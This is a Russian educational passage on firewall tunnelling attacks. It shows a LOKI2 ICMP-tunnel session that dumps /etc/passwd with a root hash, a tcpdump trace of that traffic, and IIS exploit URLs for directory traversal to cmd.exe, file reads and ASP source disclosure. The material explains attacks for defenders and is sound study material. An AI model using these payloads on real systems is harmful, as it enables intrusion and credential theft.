Атаки через туннели в межсетевом экране

Туннелирование является методом инкапсуляции (маскирования) сообщений одного типа (которые могут быть блокированы фильтрами МСЭ) внутри сообщений другого типа [Bellovin1-94]. Атаки через "туннели" возникают вследствие наличия соответствующих свойств у многих сетевых протоколов. МСЭ фильтрует сетевой трафик и принимает решения о пропуске или блокировании пакетов, опираясь на информацию об используемом сетевом протоколе. Обычно правила предусматривают соответствующую проверку с целью определения того, задействован или нет конкретный протокол. Если "да", то пакету разрешается пройти. Например, такой дефект в межсетевых экранах используется при реализации атаки Loki, которая позволяет туннелировать различные команды в запросы ICMP Echo Request и реакции на них в ответы ICMP Echo Reply, что существенно изменяет размер поля данных по сравнению со стандартным (листинг 1.1).

Листинг 1.1. Передача файла паролей в рамках атаки LOKI2

luka# loki -d server.test.ru

LOKI2 route [(с) 1997 guild corporation worldwide]

loki> ls /etc/passwd

/etc/passwd

loki> more /etc/passwd

::::::::::::::

/etc/passwd

::::::::::::::

root:3QZC8SBkLivns:0:0:root:/root:/bin/bash

daemon:*:1:1:daemon:/usr/sbin:/bin/sh

bin:*:2:2:bin:/bin:/bin/sh

sys:*:3:3:sys:/dev:/bin/sh

man:*:6:100:man:/var/catman:/bin/sh

lp:*:7:7:lp:/var/spool/Ipd:/bin/sh

mail:*:8:8:mail:/var/spool/mail:/bin/sh

news:*:9:9:news:/var/spool/news:/bin/sh

uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:*:13:13:proxy:/bin:/bin/sh

loki>

Для межсетевого экрана и любого другого традиционного средства сетевой безопасности данные действия выглядят вполне обычно. Например, вот как отображается передача файла паролей в 1СМР-"туннеле" анализатором протоколов TCPdump (листинг 1.2).

Листинг 1.2. Обнаружение атаки LOKI2

(фрагмент журнала регистрации TCPdump)

12:58:22.225 client.test.ru > server.test.ru: icmp: echo request

12:58:22.225 server.test.ru > client.test.ru: icmp: echo reply

12:58:22.275 server.test.ru > client.test.ru: icmp: echo reply

12:58:22.285 server.test.ru > client.test.ru: icmp: echo reply

12:58:28.985 client.test.ru > server.test.ru: icmp: echo request

12:58:28.985 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.035 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.055 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.075 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.095 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.115 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.135 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.155 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.175 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.195 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.215 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.235 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.255 server.test.ru > client.test.ru: icmp: echo reply

12:58:29.275 server.test.ru > client.test.ru: icmp: echo reply

Другим примером туннельных атак можно назвать атаки на уровне приложений, которые связаны с практикой использования уязвимостей в приложениях путем отправки пакетов, непосредственно связанных с этими приложениями (рис. 1.3). Таким образом, можно воспользоваться "слабым местом" в Web-приложении путем посылки HTTP-команды, которая позволяет выполнить любую команду на узле с установленным Web-сервером. Если МСЭ сконфигурирован на то, чтобы не препятствовать НТТР-трафику, пакет, содержащий атаку, будет пропущен. Например, как в случае атаки на Internet Information Server 5.0 с установленным патчем Q277873. Эта информация была опубликована Георгием Гунинским в конце ноября 2000 года в списке рассылки Buqtraq.

http://SOMEHOST/scripts/georgi.bat/..%С1%9С..%С1%9С..%Cl%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\

Рис. 1.3. Атака через туннели в межсетевом экране

Этот запрос, пропускаемый межсетевым экраном, приводит к выполнению команды "dir C:\". Аналогичным образом можно прочитать любой файл, в том числе и содержащий конфиденциальную информацию.

http://SOMEHOST/scripts/georgi.asp/..%C1%9C..%C1%9C..%Cl%9Ctest.txt

Чтение конфиденциальных данных, которые хранятся в ASP-файлах Internet Information Server, также может быть осуществлено с помощью атаки "HTTP IIS 3.0 Asp Dot". К обычному запросу

http://www.domain.ru/default.asp

злоумышленник добавляет всего лишь одну точку:

http://www.domain.ru/default.asp.

Это приводит к тому, что Web-сервер посылает данный ASP-файл Web-клиенту, где он может быть проанализирован в поисках конфиденциальной информации (пароли, параметры доступа к СУБД и т. д.).